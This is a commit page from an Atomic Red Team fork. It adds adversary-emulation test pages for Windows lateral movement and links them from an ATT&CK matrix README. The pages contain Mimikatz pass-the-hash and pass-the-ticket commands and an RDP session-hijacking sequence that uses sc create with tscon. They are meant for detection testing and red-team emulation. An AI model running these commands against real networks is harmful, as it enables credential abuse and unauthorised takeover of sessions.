security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Lateral Movement

Browse Source 
+ PtH
+ RDP
This commit is contained in:
Michael Haag
2018-04-06 08:21:28 -04:00
parent a023d346cb
commit 0bfdcfa480
3 changed files with 35 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Lateral_Movement/Pass_the_Hash.md
+15
View File
@@ -0,0 +1,15 @@
## Pass the Hash
MITRE ATT&CK Technique: [T1075](https://attack.mitre.org/wiki/Technique/T1075)
#### Mimikatz
Note: must dump hashes first
`mimikatz # sekurlsa::pth /user:Administrator /domain:atomic.local /ntlm:cc36cf7a8514893efccd3324464tkg1a`
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
#### Kerberos Ticket attack
`mimikatz # kerberos::ptt Administrator@krbtgt-atomic.LOCAL.kirbi`
Windows/Lateral_Movement/Remote_Desktop_Protocol.md
+18
View File
@@ -0,0 +1,18 @@
## Remote Desktop Protocol
MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076)
#### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
retrieve the session ID:
query user
Set the session ID and rdp-tcp# retrieved from `query user`
sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
Access the session:
net start sesshijack
Windows/README.md
+2 -2
View File
@@ -6,9 +6,9 @@
| AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md) | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
| [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | [Logon Scripts](Persistence/Logon_Scripts.md) | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol |
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | [Pass the Hash](Lateral_Movement/Pass_the_Hash.md) | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | [Remote Desktop Protocol](Lateral_Movement/Remote_Desktop_Protocol.md) | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
| [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting |
| Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels |
| [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |